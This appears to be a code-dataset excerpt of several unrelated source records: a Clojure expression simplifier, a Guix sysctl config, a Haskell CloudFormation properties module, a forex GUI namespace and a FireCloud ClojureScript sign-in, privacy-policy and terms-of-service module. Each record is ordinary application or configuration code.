(-> universal-reductions
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-random
(simplify-until-stable simplify-and-flatten))
(-> rules/sin-sq->cos-sq
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-flush-ones
(simplify-and-canonicalize simplify-and-flatten))))
(only-if logexp?
(comp (-> universal-reductions
(simplify-and-canonicalize simplify-and-flatten))
(-> (comp rules/log-expand
rules/exp-expand)
(simplify-until-stable simplify-and-flatten))
(-> (comp log-contract
rules/exp-contract)
(simplify-until-stable simplify-and-flatten))))
(-> (comp universal-reductions
(only-if logexp?
(comp rules/log-expand
rules/exp-expand))
(only-if sqrt?
sqrt-expand))
(simplify-until-stable simplify-and-flatten))
(only-if trig?
(-> rules/angular-parity
(simplify-and-canonicalize simplify-and-flatten)))
(-> rules/trig->sincos
(simplify-and-canonicalize simplify-and-flatten))
TODO this should happen at the END , only a single time , after
(only-if partials?
(-> rules/canonicalize-partials
(simplify-and-canonicalize simplify-and-flatten)))
simplify-and-flatten)]
(simple expr))))
|
6f0d0ec3c5b0ce9405eff317a32f3d644f5aef4a5de63b4127ef6ed416767d95 | clojure-quant/infra-guix | sysctl.scm |
; -to-set-sysctl-fs-notify-max-user-watches-in-guix-guix-system-error-servi/1639697#1639697
; -Services.html#Miscellaneous-Services
The service type for sysctl , which modifies kernel parameters under /proc / sys/
(modify-services %desktop-services
(sysctl-service-type config =>
(sysctl-configuration
(settings (append '(("fs.file-max" . "500000")
("fs.inotify.max_user_watches" . "524288"))
%default-sysctl-settings)))))
)
(service sysctl-service-type
(sysctl-configuration
(settings '(("fs.inotify.max_user_watches" . "100000")
("net.core.default_qdisc" . "fq")
("net.ipv4.tcp_congestion_control" . "bbr")))))))
| null | https://raw.githubusercontent.com/clojure-quant/infra-guix/586142652a67909d3bcfa84f17bfe4cd0d7c7b72/modules/awb99/config/sysctl.scm | scheme | -to-set-sysctl-fs-notify-max-user-watches-in-guix-guix-system-error-servi/1639697#1639697
-Services.html#Miscellaneous-Services |
The service type for sysctl , which modifies kernel parameters under /proc / sys/
(modify-services %desktop-services
(sysctl-service-type config =>
(sysctl-configuration
(settings (append '(("fs.file-max" . "500000")
("fs.inotify.max_user_watches" . "524288"))
%default-sysctl-settings)))))
)
(service sysctl-service-type
(sysctl-configuration
(settings '(("fs.inotify.max_user_watches" . "100000")
("net.core.default_qdisc" . "fq")
("net.ipv4.tcp_congestion_control" . "bbr")))))))
|
db2fba3a007b1a55ddec32d580edb3d4ab985a6bb88641888d3afe5755c7604c | mbj/stratosphere | ResourceProperties.hs | module Stratosphere.ResourceProperties
( ResourceProperties(..)
, ToResourceProperties(..)
, resourcePropertiesJSON
)
where
import Stratosphere.Prelude
import qualified Data.Aeson as JSON
import qualified Data.Aeson.Types as JSON
data ResourceProperties
= ResourceProperties
{ awsType :: Text
, properties :: JSON.Object
, supportsTags :: Bool
}
deriving (Show, Eq)
class ToResourceProperties a where
toResourceProperties :: a -> ResourceProperties
resourcePropertiesJSON :: ResourceProperties -> [JSON.Pair]
resourcePropertiesJSON ResourceProperties{..} =
[ "Type" .= awsType
, "Properties" .= properties
]
| null | https://raw.githubusercontent.com/mbj/stratosphere/c70f301715425247efcda29af4f3fcf7ec04aa2f/src/Stratosphere/ResourceProperties.hs | haskell | module Stratosphere.ResourceProperties
( ResourceProperties(..)
, ToResourceProperties(..)
, resourcePropertiesJSON
)
where
import Stratosphere.Prelude
import qualified Data.Aeson as JSON
import qualified Data.Aeson.Types as JSON
data ResourceProperties
= ResourceProperties
{ awsType :: Text
, properties :: JSON.Object
, supportsTags :: Bool
}
deriving (Show, Eq)
class ToResourceProperties a where
toResourceProperties :: a -> ResourceProperties
resourcePropertiesJSON :: ResourceProperties -> [JSON.Pair]
resourcePropertiesJSON ResourceProperties{..} =
[ "Type" .= awsType
, "Properties" .= properties
]
| |
9169cf1ec2e5007f4a1f24286b88665ea54fcf3ff9c6b102cb1c7f3c7f853623 | Storkle/clj-forex | gui.clj |
(clojure.core/use 'nstools.ns)
(ns+ forex.gui
(:clone clj.core)
(:import (javax.swing JScrollPane JFrame JPanel JTextArea
JLabel JButton SwingUtilities))
(:use forex.util.general forex.util.gui clojure.contrib.miglayout)
(:use forex.util.core
forex.util.emacs
forex.util.log)
(:use forex.module.error
forex.module.ea
forex.module.indicator
forex.module.account forex.module.account.utils
[clj-time.core :exclude [extend start]])
(:require
[forex.module.service :as backend]))
| null | https://raw.githubusercontent.com/Storkle/clj-forex/1800b982037b821732b9df1e2e5ea1eda70f941f/src/forex/gui.clj | clojure |
(clojure.core/use 'nstools.ns)
(ns+ forex.gui
(:clone clj.core)
(:import (javax.swing JScrollPane JFrame JPanel JTextArea
JLabel JButton SwingUtilities))
(:use forex.util.general forex.util.gui clojure.contrib.miglayout)
(:use forex.util.core
forex.util.emacs
forex.util.log)
(:use forex.module.error
forex.module.ea
forex.module.indicator
forex.module.account forex.module.account.utils
[clj-time.core :exclude [extend start]])
(:require
[forex.module.service :as backend]))
| |
1b443a24629ec5f53c02206a4f34f4c0aede7a0ae5feed5ef2a4fe1b34038fff | broadinstitute/firecloud-ui | auth.cljs | (ns broadfcui.auth
(:require
[dmohs.react :as react]
[clojure.string :as string]
[broadfcui.common :refer [login-scopes]]
[broadfcui.common :as common]
[broadfcui.common.icons :as icons]
[broadfcui.common.links :as links]
[broadfcui.common.markdown :as markdown]
[broadfcui.common.style :as style]
[broadfcui.components.buttons :as buttons]
[broadfcui.components.spinner :refer [spinner]]
[broadfcui.config :as config]
[broadfcui.endpoints :as endpoints]
[broadfcui.nav :as nav]
[broadfcui.page.external-importer :as external-importer]
[broadfcui.utils :as utils]
[broadfcui.utils.ajax :as ajax]
[broadfcui.utils.user :as user]
))
(react/defc GoogleAuthLibLoader
{:render
(constantly nil)
:component-did-mount
(fn [{:keys [this]}]
(js/gapi.load "auth2" #(this :-handle-auth2-loaded)))
:-handle-auth2-loaded
(fn [{:keys [props]}]
NB : we do not override the fetch_basic_profile config option on auth2.init .
;; fetch_basic_profile defaults to true, and adds "openid email profile" to the
;; list of requested scopes.
(let [{:keys [on-loaded]} props
scopes (string/join
" "
login-scopes)
init-options (clj->js {:client_id (config/google-client-id) :scope scopes})
auth2 (js/gapi.auth2.init init-options)]
(gapi.signin2.render "sign-in-button" #js{:width 180 :height 40 :longtitle true :theme "dark"})
(user/set-google-auth2-instance! auth2)
(on-loaded auth2)))})
(react/defc- Policy
{:render
(fn [{:keys [props]}]
[:div {:style {:maxWidth 716 :backgroundColor "white"
:margin "2.5rem auto 0"
:fontSize (when (= (:context props) :logged-out) "88%")}}
(when (= (:context props) :policy-page)
(list
[:h4 {} "FireCloud Privacy Policy"]
[:p {}
"The following Privacy Policy discloses our information gathering and dissemination
practices for the Broad Institute FireCloud application accessed via the website "
(links/create-external {:href "/"}
"/")
". By using the FireCloud, you agree to the collection and use of information in
accordance with this policy. This Privacy Policy is effective as of 1-19-2017."]
[:h4 {} "Information Gathering"]
[:p {}
"The Broad Institute FireCloud receives and stores information related to users’ Google
profiles, including names, email addresses, user IDs, and OAuth tokens. This information
is gathered as part of the standard Google sign-in process."]
[:p {}
"We also collect information that your browser sends whenever you visit the FireCloud
website (“Log Data”). This Log Data may include information such as your computer’s
Internet Protocol (“IP”) address, browser type, browser version, which pages of the
FireCloud Portal that you visit, the time and date of your visit, the time spent on
individual pages, and other statistics. This information may include any search terms
that you enter on the FireCloud (e.g., dataset name, method name, tag labels). We do not
link IP addresses to any personally identifying information. User sessions will be
tracked, but users will remain anonymous."]
[:p {}
"In addition, we use web tools such as Google Analytics that collect, monitor, and analyze
the Log Data. User information (i.e., name and email address) is not included in our
Google Analytics tracking, but can be internally linked within the FireCloud development
team."]
[:h4 {} "Use of Information"]
[:p {}
"FireCloud uses the information gathered above to enable integration with Google-based
services that require a Google account, such as Google Cloud Storage Platform. We may
also use this information to provide you with the services on FireCloud, improve
FireCloud, and to communicate with you (e.g., about new feature announcements, unplanned
site maintenance, and general notices). Web server logs are retained on a temporary basis
and then deleted completely from our systems. User information is stored in a
password-protected database, and OAuth tokens are only stored for the length of an active
session, are encrypted at rest, and are deleted upon sign out."]
[:p {}
"At no time do we disclose any user information to third parties."]
[:h4 {} "Publicly Uploaded Information"]
[:p {}
"Some features of FireCloud are public facing (e.g, publishing a workspace in the Data
Library) and allow you to upload information (such as new studies) that you may choose to
make publicly available. If you choose to upload content is public-facing, third parties
may access and use it. We do not sell any information that you provide to FireCloud; it
is yours. However, any information that you make publicly available may be accessed and
used by third parties, such as research organizations or commercial third parties."]
[:h4 {} "Security"]
[:p {}
"This site has security measures in place to prevent the loss, misuse, or alteration of
the information under our control. It is compliant with NIST-800-53 and has been audited
as per FISMA Moderate. The Broad Institute, however, is not liable for the loss, misuse,
or alteration of information on this site by any third party."]
[:h4 {} "Changes"]
[:p {}
"Although most changes are likely to be minor, we may change our Privacy Policy from time
to time. We will notify you of material changes to this Privacy Policy through the
FireCloud website at least 30 days before the change takes effect by posting a notice on
our home page or by sending an email to the email address associated with your user
account. For changes to this Privacy Policy that do not affect your rights, we encourage
you to check this page frequently."]
[:h4 {} "Third Party Sites"]
[:p {}
"Some FireCloud pages may link to third party websites or services that are not maintained
by the Broad Institute. The Broad Institute is not responsible for the privacy practices
or the content of any such third party websites or services."]
[:h4 {} "Contacting the FireCloud team"]
[:p {}
"If you have any questions about this privacy statement, the practices of this site, or
your dealings with this site, you can contact us through our "
(links/create-external {:href (config/forum-url)} "help forum")
"."]
[:hr]))
[:h4 {} "WARNING NOTICE"]
[:p {}
"You are accessing a US Government web site which may contain information that must be
protected under the US Privacy Act or other sensitive information and is intended for
Government authorized use only."]
[:p {}
"Unauthorized attempts to upload information, change information, or use of this web site
may result in disciplinary action, civil, and/or criminal penalties. Unauthorized users
of this website should have no expectation of privacy regarding any communications or
data processed by this website."]
[:p {}
"Anyone accessing this website expressly consents to monitoring of their actions and all
communications or data transiting or stored on related to this website and is advised
that if such monitoring reveals possible evidence of criminal activity, NIH may provide
that evidence to law enforcement officials."]
[:h4 {} "WARNING NOTICE (when accessing TCGA controlled data)"]
[:p {:style {:fontWeight "bold"}}
"You are reminded that when accessing TCGA controlled access information you are bound by the
dbGaP TCGA "
(links/create-external {:href ""}
"DATA USE CERTIFICATION AGREEMENT (DUCA)")
"."]])})
(react/defc- PolicyPage
{:render
(fn []
[:div {:style {:padding "1rem" :margin -20 :marginTop "1rem"
:backgroundColor "white"}}
[Policy {:context :policy-page}]])})
(react/defc LoggedOut
{:render
(fn [{:keys [this props]}]
(let [import-page? (string/starts-with? js/document.location.hash "#import")]
Google 's code complains if the sign - in button goes missing , so we hide this component rather
;; than removing it from the page.
[:div {:style {:display (when (:hidden? props) "none") :marginTop "2rem"}}
[:div {:style {:margin "0 auto" :maxWidth 716}}
[:h1 {:style {:marginBottom "0.3rem" :fontWeight 400}}
(cond
import-page? external-importer/import-title
common/has-return? "Hello"
:else "New User?")]
[:div {:style {:marginBottom "1.5rem"}}
(cond
import-page? external-importer/import-subtitle
common/has-return? "The content you are looking for is currently only accessible through the Terra platform's legacy UI."
:else "FireCloud requires a Google account.")]
[:div {:style {:display "flex"}}
[:div {:style {:paddingRight "2rem" :borderRight style/dark-line}}
(if import-page?
(external-importer/render-import-tutorial)
[:div {:style {:lineHeight "130%"}}
(if common/has-return?
"Technically, this is a separate application. You will be asked to re-register and sign-in, as well as accept the Terms of Service. Please use the same Google identity you use to sign in to the Terra platform and co-branded sites."
"Need to create a FireCloud account? FireCloud uses your Google account. Once you have signed in and completed the user profile registration step, you can start using FireCloud.")
(when common/has-return?
[:div {:style {:marginTop "1.5rem"}} "Please bear with us as we migrate this functionality to our new user interface."])
(links/create-external {:style {:display "block" :marginTop "0.3rem"}
:href ""}
"Learn how to create a Google account with any email address.")])]
[:div {:id "sign-in-button"
:style {:flexShrink 0 :width 180 :paddingLeft "2rem" :alignSelf "center"}
:onClick #(this :-handle-sign-in-click)}
(spinner (:spinner-text props))]]]
[Policy {:context :logged-out}]]))
:component-did-mount
(fn [{:keys [props locals]}]
(swap! locals assoc :refresh-token-saved? true)
(let [{:keys [on-change]} props]
(user/add-user-listener
::logged-out
#(on-change (js-invoke % "isSignedIn") (:refresh-token-saved? @locals)))))
:component-will-unmount
(fn []
(user/remove-user-listener ::logged-out))
:-handle-sign-in-click
(fn [{:keys [props locals]}]
(swap! locals dissoc :refresh-token-saved?)
(let [{:keys [auth2 on-change]} props]
(-> auth2
(.grantOfflineAccess (clj->js {:redirect_uri "postmessage"
:prompt "select_account"}))
(.then (fn [_]
(swap! locals assoc :refresh-token-saved? true)
(let [signed-in? (-> auth2
(aget "currentUser")
(js-invoke "get")
(js-invoke "isSignedIn"))]
(on-change signed-in? true)))))))})
;; Borked servers often return HTML pages instead of JSON, so suppress JSON parsing
;; exceptions because they are useless ("Unexpected token T in JSON...")
(defn- handle-server-error [status-code get-parsed-response]
(let [[_ parsing-error] (get-parsed-response true)]
(if (= 0 status-code)
;; status code 0 typically happens when CORS preflight fails/rejects
{:message "Ajax error."
:statusCode 0}
(if parsing-error
{:message (str "Cannot reach the API server. The API server or one of its subsystems may be down.")
:statusCode status-code}
{:message (get-parsed-response)
:statusCode status-code}))))
(react/defc UserStatus
{:render
(fn [{:keys [state]}]
[:div {:style {:padding "40px 0"}}
(case (:error @state)
nil (spinner "Loading user information...")
:not-active [:div {:style {:color (:state-exception style/colors)}}
"Thank you for registering. Your account is currently inactive."
" You will be contacted via email when your account is activated."]
[:div {}
[:div {:style {:color (:state-exception style/colors) :paddingBottom "1rem"}}
"Error loading user information. Please try again later."]
[:table {:style {:color (:text-lighter style/colors)}}
[:tbody {:style {}}
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "What went wrong:"] [:td {} (:message (:error @state))]]
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "Status code:"] [:td {} (:statusCode (:error @state))]]]]])])
:component-did-mount
(fn [{:keys [props state]}]
(let [{:keys [on-success]} props]
(ajax/call-orch "/me?userDetailsOnly=true"
{:on-done (fn [{:keys [success? status-code get-parsed-response]}]
(if success?
(on-success)
(case status-code
403 can now mean " user has not yet accepted the "
403 (on-success)
404 means " not yet registered "
404 (on-success)
(swap! state assoc :error (handle-server-error status-code get-parsed-response)))))}
:service-prefix "")))})
(react/defc TermsOfService
{:render
(fn [{:keys [state this]}]
(let [{:keys [error tos]} @state
update-status #(this :-get-status)]
[:div {}
(links/create-internal {:style {:position "absolute" :right "1rem" :top "1rem"}
:onClick #(.signOut @user/auth2-atom)}
"Sign Out")
(case error
nil (spinner "Loading Terms of Service information...")
(:declined :not-agreed) [:div {:style {:padding "2rem" :margin "5rem auto" :maxWidth 600
:border style/standard-line}}
[:h2 {:style {:marginTop 0}} "You must accept the Terms of Service to use FireCloud."]
[:div {:style {:display "flex" :flexDirection "column" :alignItems "center"}}
(if tos
[markdown/MarkdownView {:text tos}]
(spinner
[:span {}
"Loading Terms of Service; also available "
[:a {:target "_blank"
:href (str (config/terra-base-url) "/#terms-of-service")}
"here"] "."]))
[:div {:style {:display "flex" :width 200 :justifyContent "space-evenly" :marginTop "1rem"}}
[buttons/Button {:text "Accept" :onClick (:submit-tos @state)}]]]]
[:div {}
[:div {:style {:color (:state-exception style/colors) :paddingBottom "1rem"}}
"Error loading Terms of Service information. Please try again later."]
[:table {:style {:color (:text-lighter style/colors)}}
[:tbody {:style {}}
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "What went wrong:"] [:td {} (:message error)]]
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "Status code:"] [:td {} (:statusCode error)]]]]])]))
:component-did-mount
(fn [{:keys [state this]}]
(this :-get-status))
:-get-tos-text
(fn [{:keys [props state]}]
(let [{:keys [on-success]} props]
(endpoints/tos-get-text
(fn [{:keys [success? status-code raw-response]}]
(swap! state assoc :tos
(if success?
raw-response
(str "Could not load Terms of Service; please read it at "
(str (config/terra-base-url) "/#terms-of-service")
".")))))))
:-get-status
(fn [{:keys [props state this]}]
(let [{:keys [on-success]} props
update-status #(this :-get-status)]
(endpoints/tos-get-status
(fn [{:keys [success? status-code get-parsed-response raw-response]}]
(if (= "true" raw-response)
(on-success)
(do
(this :-get-tos-text)
(swap! state assoc :submit-tos #(endpoints/tos-set-status "app.terra.bio/#terms-of-service" update-status))
(case status-code
;; in this case, the response was false, which is considered a failure case
200 (swap! state assoc :error :not-agreed)
403 means the user declined the TOS ( or has invalid token ? Need to distinguish )
403 (swap! state assoc :error :declined)
(swap! state assoc :error (handle-server-error status-code get-parsed-response)))))))))})
(defn reject-tos [on-done] (endpoints/tos-set-status false on-done))
(defn force-signed-in [{:keys [on-sign-in on-sign-out on-error]}]
(fn [auth-token extra-on-sign-in]
(ajax/call {:url (str "="
(js/encodeURIComponent auth-token))
:on-done
(fn [{:keys [status-code success? get-parsed-response raw-response]}]
use console.warn to make sure logs are captured by selenium
(js/console.warn (str "force-signed-in: <" success? "> " raw-response))
(if success?
(let [{:keys [email sub]} (get-parsed-response)
auth2 (clj->js
{:currentUser
{:get
(constantly
(clj->js
{:getAuthResponse
(constantly (clj->js {:access_token auth-token}))
:getBasicProfile
(constantly (clj->js {:getEmail (constantly email)
:getId (constantly sub)}))
:hasGrantedScopes (constantly true)}))
:listen (constantly nil)}
:signOut on-sign-out})]
(user/set-google-auth2-instance! auth2)
(on-sign-in)
(when (some? extra-on-sign-in)
(extra-on-sign-in)))
(on-error {:status status-code :response raw-response})))})))
(defn render-forced-sign-in-error [error]
[:div {}
[:div {} "Status: " (:status error)]
[:div {} "Response: " (:response error)]])
(defn add-nav-paths []
(nav/defpath
:policy
{:public? true
:component PolicyPage
:regex #"policy"
:make-props (fn [_] {})
:make-path (fn [] "policy")}))
| null | https://raw.githubusercontent.com/broadinstitute/firecloud-ui/8eb077bc137ead105db5665a8fa47a7523145633/src/cljs/main/broadfcui/auth.cljs | clojure | fetch_basic_profile defaults to true, and adds "openid email profile" to the
list of requested scopes.
it
than removing it from the page.
Borked servers often return HTML pages instead of JSON, so suppress JSON parsing
exceptions because they are useless ("Unexpected token T in JSON...")
status code 0 typically happens when CORS preflight fails/rejects
in this case, the response was false, which is considered a failure case | (ns broadfcui.auth
(:require
[dmohs.react :as react]
[clojure.string :as string]
[broadfcui.common :refer [login-scopes]]
[broadfcui.common :as common]
[broadfcui.common.icons :as icons]
[broadfcui.common.links :as links]
[broadfcui.common.markdown :as markdown]
[broadfcui.common.style :as style]
[broadfcui.components.buttons :as buttons]
[broadfcui.components.spinner :refer [spinner]]
[broadfcui.config :as config]
[broadfcui.endpoints :as endpoints]
[broadfcui.nav :as nav]
[broadfcui.page.external-importer :as external-importer]
[broadfcui.utils :as utils]
[broadfcui.utils.ajax :as ajax]
[broadfcui.utils.user :as user]
))
(react/defc GoogleAuthLibLoader
{:render
(constantly nil)
:component-did-mount
(fn [{:keys [this]}]
(js/gapi.load "auth2" #(this :-handle-auth2-loaded)))
:-handle-auth2-loaded
(fn [{:keys [props]}]
NB : we do not override the fetch_basic_profile config option on auth2.init .
(let [{:keys [on-loaded]} props
scopes (string/join
" "
login-scopes)
init-options (clj->js {:client_id (config/google-client-id) :scope scopes})
auth2 (js/gapi.auth2.init init-options)]
(gapi.signin2.render "sign-in-button" #js{:width 180 :height 40 :longtitle true :theme "dark"})
(user/set-google-auth2-instance! auth2)
(on-loaded auth2)))})
(react/defc- Policy
{:render
(fn [{:keys [props]}]
[:div {:style {:maxWidth 716 :backgroundColor "white"
:margin "2.5rem auto 0"
:fontSize (when (= (:context props) :logged-out) "88%")}}
(when (= (:context props) :policy-page)
(list
[:h4 {} "FireCloud Privacy Policy"]
[:p {}
"The following Privacy Policy discloses our information gathering and dissemination
practices for the Broad Institute FireCloud application accessed via the website "
(links/create-external {:href "/"}
"/")
". By using the FireCloud, you agree to the collection and use of information in
accordance with this policy. This Privacy Policy is effective as of 1-19-2017."]
[:h4 {} "Information Gathering"]
[:p {}
"The Broad Institute FireCloud receives and stores information related to users’ Google
profiles, including names, email addresses, user IDs, and OAuth tokens. This information
is gathered as part of the standard Google sign-in process."]
[:p {}
"We also collect information that your browser sends whenever you visit the FireCloud
website (“Log Data”). This Log Data may include information such as your computer’s
Internet Protocol (“IP”) address, browser type, browser version, which pages of the
FireCloud Portal that you visit, the time and date of your visit, the time spent on
individual pages, and other statistics. This information may include any search terms
that you enter on the FireCloud (e.g., dataset name, method name, tag labels). We do not
link IP addresses to any personally identifying information. User sessions will be
tracked, but users will remain anonymous."]
[:p {}
"In addition, we use web tools such as Google Analytics that collect, monitor, and analyze
the Log Data. User information (i.e., name and email address) is not included in our
Google Analytics tracking, but can be internally linked within the FireCloud development
team."]
[:h4 {} "Use of Information"]
[:p {}
"FireCloud uses the information gathered above to enable integration with Google-based
services that require a Google account, such as Google Cloud Storage Platform. We may
also use this information to provide you with the services on FireCloud, improve
FireCloud, and to communicate with you (e.g., about new feature announcements, unplanned
site maintenance, and general notices). Web server logs are retained on a temporary basis
and then deleted completely from our systems. User information is stored in a
password-protected database, and OAuth tokens are only stored for the length of an active
session, are encrypted at rest, and are deleted upon sign out."]
[:p {}
"At no time do we disclose any user information to third parties."]
[:h4 {} "Publicly Uploaded Information"]
[:p {}
"Some features of FireCloud are public facing (e.g, publishing a workspace in the Data
Library) and allow you to upload information (such as new studies) that you may choose to
make publicly available. If you choose to upload content is public-facing, third parties
is yours. However, any information that you make publicly available may be accessed and
used by third parties, such as research organizations or commercial third parties."]
[:h4 {} "Security"]
[:p {}
"This site has security measures in place to prevent the loss, misuse, or alteration of
the information under our control. It is compliant with NIST-800-53 and has been audited
as per FISMA Moderate. The Broad Institute, however, is not liable for the loss, misuse,
or alteration of information on this site by any third party."]
[:h4 {} "Changes"]
[:p {}
"Although most changes are likely to be minor, we may change our Privacy Policy from time
to time. We will notify you of material changes to this Privacy Policy through the
FireCloud website at least 30 days before the change takes effect by posting a notice on
our home page or by sending an email to the email address associated with your user
account. For changes to this Privacy Policy that do not affect your rights, we encourage
you to check this page frequently."]
[:h4 {} "Third Party Sites"]
[:p {}
"Some FireCloud pages may link to third party websites or services that are not maintained
by the Broad Institute. The Broad Institute is not responsible for the privacy practices
or the content of any such third party websites or services."]
[:h4 {} "Contacting the FireCloud team"]
[:p {}
"If you have any questions about this privacy statement, the practices of this site, or
your dealings with this site, you can contact us through our "
(links/create-external {:href (config/forum-url)} "help forum")
"."]
[:hr]))
[:h4 {} "WARNING NOTICE"]
[:p {}
"You are accessing a US Government web site which may contain information that must be
protected under the US Privacy Act or other sensitive information and is intended for
Government authorized use only."]
[:p {}
"Unauthorized attempts to upload information, change information, or use of this web site
may result in disciplinary action, civil, and/or criminal penalties. Unauthorized users
of this website should have no expectation of privacy regarding any communications or
data processed by this website."]
[:p {}
"Anyone accessing this website expressly consents to monitoring of their actions and all
communications or data transiting or stored on related to this website and is advised
that if such monitoring reveals possible evidence of criminal activity, NIH may provide
that evidence to law enforcement officials."]
[:h4 {} "WARNING NOTICE (when accessing TCGA controlled data)"]
[:p {:style {:fontWeight "bold"}}
"You are reminded that when accessing TCGA controlled access information you are bound by the
dbGaP TCGA "
(links/create-external {:href ""}
"DATA USE CERTIFICATION AGREEMENT (DUCA)")
"."]])})
(react/defc- PolicyPage
{:render
(fn []
[:div {:style {:padding "1rem" :margin -20 :marginTop "1rem"
:backgroundColor "white"}}
[Policy {:context :policy-page}]])})
(react/defc LoggedOut
{:render
(fn [{:keys [this props]}]
(let [import-page? (string/starts-with? js/document.location.hash "#import")]
Google 's code complains if the sign - in button goes missing , so we hide this component rather
[:div {:style {:display (when (:hidden? props) "none") :marginTop "2rem"}}
[:div {:style {:margin "0 auto" :maxWidth 716}}
[:h1 {:style {:marginBottom "0.3rem" :fontWeight 400}}
(cond
import-page? external-importer/import-title
common/has-return? "Hello"
:else "New User?")]
[:div {:style {:marginBottom "1.5rem"}}
(cond
import-page? external-importer/import-subtitle
common/has-return? "The content you are looking for is currently only accessible through the Terra platform's legacy UI."
:else "FireCloud requires a Google account.")]
[:div {:style {:display "flex"}}
[:div {:style {:paddingRight "2rem" :borderRight style/dark-line}}
(if import-page?
(external-importer/render-import-tutorial)
[:div {:style {:lineHeight "130%"}}
(if common/has-return?
"Technically, this is a separate application. You will be asked to re-register and sign-in, as well as accept the Terms of Service. Please use the same Google identity you use to sign in to the Terra platform and co-branded sites."
"Need to create a FireCloud account? FireCloud uses your Google account. Once you have signed in and completed the user profile registration step, you can start using FireCloud.")
(when common/has-return?
[:div {:style {:marginTop "1.5rem"}} "Please bear with us as we migrate this functionality to our new user interface."])
(links/create-external {:style {:display "block" :marginTop "0.3rem"}
:href ""}
"Learn how to create a Google account with any email address.")])]
[:div {:id "sign-in-button"
:style {:flexShrink 0 :width 180 :paddingLeft "2rem" :alignSelf "center"}
:onClick #(this :-handle-sign-in-click)}
(spinner (:spinner-text props))]]]
[Policy {:context :logged-out}]]))
:component-did-mount
(fn [{:keys [props locals]}]
(swap! locals assoc :refresh-token-saved? true)
(let [{:keys [on-change]} props]
(user/add-user-listener
::logged-out
#(on-change (js-invoke % "isSignedIn") (:refresh-token-saved? @locals)))))
:component-will-unmount
(fn []
(user/remove-user-listener ::logged-out))
:-handle-sign-in-click
(fn [{:keys [props locals]}]
(swap! locals dissoc :refresh-token-saved?)
(let [{:keys [auth2 on-change]} props]
(-> auth2
(.grantOfflineAccess (clj->js {:redirect_uri "postmessage"
:prompt "select_account"}))
(.then (fn [_]
(swap! locals assoc :refresh-token-saved? true)
(let [signed-in? (-> auth2
(aget "currentUser")
(js-invoke "get")
(js-invoke "isSignedIn"))]
(on-change signed-in? true)))))))})
(defn- handle-server-error [status-code get-parsed-response]
(let [[_ parsing-error] (get-parsed-response true)]
(if (= 0 status-code)
{:message "Ajax error."
:statusCode 0}
(if parsing-error
{:message (str "Cannot reach the API server. The API server or one of its subsystems may be down.")
:statusCode status-code}
{:message (get-parsed-response)
:statusCode status-code}))))
(react/defc UserStatus
{:render
(fn [{:keys [state]}]
[:div {:style {:padding "40px 0"}}
(case (:error @state)
nil (spinner "Loading user information...")
:not-active [:div {:style {:color (:state-exception style/colors)}}
"Thank you for registering. Your account is currently inactive."
" You will be contacted via email when your account is activated."]
[:div {}
[:div {:style {:color (:state-exception style/colors) :paddingBottom "1rem"}}
"Error loading user information. Please try again later."]
[:table {:style {:color (:text-lighter style/colors)}}
[:tbody {:style {}}
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "What went wrong:"] [:td {} (:message (:error @state))]]
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "Status code:"] [:td {} (:statusCode (:error @state))]]]]])])
:component-did-mount
(fn [{:keys [props state]}]
(let [{:keys [on-success]} props]
(ajax/call-orch "/me?userDetailsOnly=true"
{:on-done (fn [{:keys [success? status-code get-parsed-response]}]
(if success?
(on-success)
(case status-code
403 can now mean " user has not yet accepted the "
403 (on-success)
404 means " not yet registered "
404 (on-success)
(swap! state assoc :error (handle-server-error status-code get-parsed-response)))))}
:service-prefix "")))})
(react/defc TermsOfService
{:render
(fn [{:keys [state this]}]
(let [{:keys [error tos]} @state
update-status #(this :-get-status)]
[:div {}
(links/create-internal {:style {:position "absolute" :right "1rem" :top "1rem"}
:onClick #(.signOut @user/auth2-atom)}
"Sign Out")
(case error
nil (spinner "Loading Terms of Service information...")
(:declined :not-agreed) [:div {:style {:padding "2rem" :margin "5rem auto" :maxWidth 600
:border style/standard-line}}
[:h2 {:style {:marginTop 0}} "You must accept the Terms of Service to use FireCloud."]
[:div {:style {:display "flex" :flexDirection "column" :alignItems "center"}}
(if tos
[markdown/MarkdownView {:text tos}]
(spinner
[:span {}
"Loading Terms of Service; also available "
[:a {:target "_blank"
:href (str (config/terra-base-url) "/#terms-of-service")}
"here"] "."]))
[:div {:style {:display "flex" :width 200 :justifyContent "space-evenly" :marginTop "1rem"}}
[buttons/Button {:text "Accept" :onClick (:submit-tos @state)}]]]]
[:div {}
[:div {:style {:color (:state-exception style/colors) :paddingBottom "1rem"}}
"Error loading Terms of Service information. Please try again later."]
[:table {:style {:color (:text-lighter style/colors)}}
[:tbody {:style {}}
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "What went wrong:"] [:td {} (:message error)]]
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "Status code:"] [:td {} (:statusCode error)]]]]])]))
:component-did-mount
(fn [{:keys [state this]}]
(this :-get-status))
:-get-tos-text
(fn [{:keys [props state]}]
(let [{:keys [on-success]} props]
(endpoints/tos-get-text
(fn [{:keys [success? status-code raw-response]}]
(swap! state assoc :tos
(if success?
raw-response
(str "Could not load Terms of Service; please read it at "
(str (config/terra-base-url) "/#terms-of-service")
".")))))))
:-get-status
(fn [{:keys [props state this]}]
(let [{:keys [on-success]} props
update-status #(this :-get-status)]
(endpoints/tos-get-status
(fn [{:keys [success? status-code get-parsed-response raw-response]}]
(if (= "true" raw-response)
(on-success)
(do
(this :-get-tos-text)
(swap! state assoc :submit-tos #(endpoints/tos-set-status "app.terra.bio/#terms-of-service" update-status))
(case status-code
200 (swap! state assoc :error :not-agreed)
403 means the user declined the TOS ( or has invalid token ? Need to distinguish )
403 (swap! state assoc :error :declined)
(swap! state assoc :error (handle-server-error status-code get-parsed-response)))))))))})
(defn reject-tos [on-done] (endpoints/tos-set-status false on-done))
(defn force-signed-in [{:keys [on-sign-in on-sign-out on-error]}]
(fn [auth-token extra-on-sign-in]
